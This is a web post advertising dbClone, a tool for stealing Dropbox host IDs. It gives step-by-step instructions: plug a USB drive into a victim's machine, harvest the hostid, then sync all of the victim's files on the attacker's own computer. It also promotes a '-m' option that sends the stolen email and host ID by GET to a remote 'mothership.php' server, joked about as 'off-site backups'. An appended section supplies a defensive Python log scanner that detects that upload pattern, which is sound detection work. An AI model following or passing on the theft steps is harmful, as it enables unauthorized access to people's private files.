Reinventing the wheel
Dropbox authentication exploit, dbClone.
After reading this article on dereknewton.com about Dropbox’s insecure design, sablefoxx, a resourceful young coder on the forum, created a Python application to exploit the insecure design of the most popular file synchronisation tool, Dropbox.
Download dbClone from here or on the download page.
 Find a victim machine running Dropbox, insert your USB drive
 Run dbClone.exe, data will be saved in a .txt file
 On your own computer install the Dropbox client and run “dbClone.exe -i”
 Paste in the ‘hostid’ from the .txt file into the ‘hostid’ prompt, enter /any/ email
 Start up the Dropbox client, and sync all the files!!!
But Wait There’s More!:
Use -m to upload the email and hostid to your webserver (via GET), for example “dbClone.exe -m http://somesite.com” (note: it appends “mothership.php” to the URL); example code is in /src/mothership.php!
Tested on Windows 7 & Ubuntu 10.10, but should run on just about any Windows/Linux box without much fuss. They really should fix this problem. This program can also send the HostIds to a remote web server (for off-site backups of course).
Source code is included.
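For defenders, the -m upload described above leaves a trace in outbound web proxy logs: a GET request to a path ending in “mothership.php” that carries an email address and a host ID in the query string. The following detection check is an added example, not part of dbClone or the original post; the log layout, the query parameter names and the hex shape of the host ID are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumptions (not from the page): the query parameter names and the host ID
# being a long hex string. The page only says "email and hostid ... via GET".
ID_PARAMS = {"hostid", "host_id"}
HEX_ID = re.compile(r"[0-9a-fA-F]{16,}")
ENDPOINT = "/mothership.php"  # file name the page says the tool appends to the URL

# Constructed proxy log: timestamp, client IP, method, URL, status.
SAMPLE_LOG = """\
2011-04-20T10:01:02Z 10.0.0.15 GET http://updates.example.net/check?v=1.0 200
2011-04-20T10:03:44Z 10.0.0.23 GET http://collector.example.org/mothership.php?email=a%40example.com&hostid=0123456789abcdef0123456789abcdef 200
2011-04-20T10:05:10Z 10.0.0.23 GET http://files.example.com/report.php?id=42 200
2011-04-20T10:07:31Z 10.0.0.31 GET http://other.example.org/x.php?mail=b%40example.com&host_id=FEDCBA9876543210FEDCBA9876543210 200
"""

def classify(method, url):
    """Return the reasons a request resembles the host ID upload, or []."""
    if method.upper() != "GET":
        return []
    parts = urlsplit(url)
    reasons = []
    if parts.path.lower().endswith(ENDPOINT):
        reasons.append("endpoint")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in ID_PARAMS and HEX_ID.fullmatch(value):
            reasons.append("host-id-param")
        elif "@" in value:
            reasons.append("email-value")
    # An email address alone is too common to alert on; require a strong signal.
    return reasons if {"endpoint", "host-id-param"} & set(reasons) else []

def scan(log_text):
    """Return (client_ip, destination_host, reasons) for each suspicious line."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines
        _, client, method, url, _ = fields
        reasons = classify(method, url)
        if reasons:
            findings.append((client, urlsplit(url).hostname, reasons))
    return findings

if __name__ == "__main__":
    for client, host, reasons in scan(SAMPLE_LOG):
        print(f"{client} -> {host}: {', '.join(reasons)}")
```

A renamed endpoint still trips the host-id-param rule, which is why the check does not rely on the file name alone.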